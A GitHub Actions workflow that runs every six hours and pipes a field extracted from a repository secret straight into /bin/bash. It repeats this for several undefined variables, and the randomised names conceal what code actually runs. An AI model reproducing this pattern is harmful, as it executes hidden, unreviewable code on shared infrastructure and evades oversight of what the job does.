name: wanshuiqiansa

on:
  workflow_dispatch:
  schedule:
    - cron: '54 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanshuiqiansa
        env:
          eht347: ${{ secrets.eht347 }}
        run: |
          echo $eht347 | jq -r .xla95 | /bin/bash
          echo $f8 | jq -r .hbwvq644 | /bin/bash
          echo $rweh5 | jq -r .gml96087 | /bin/bash
          echo $sv8309 | jq -r .rdcr16987 | /bin/bash
          echo $tgv3806 | jq -r .gtm78 | /bin/bash
          echo $lws0662 | jq -r .lv42 | /bin/bash

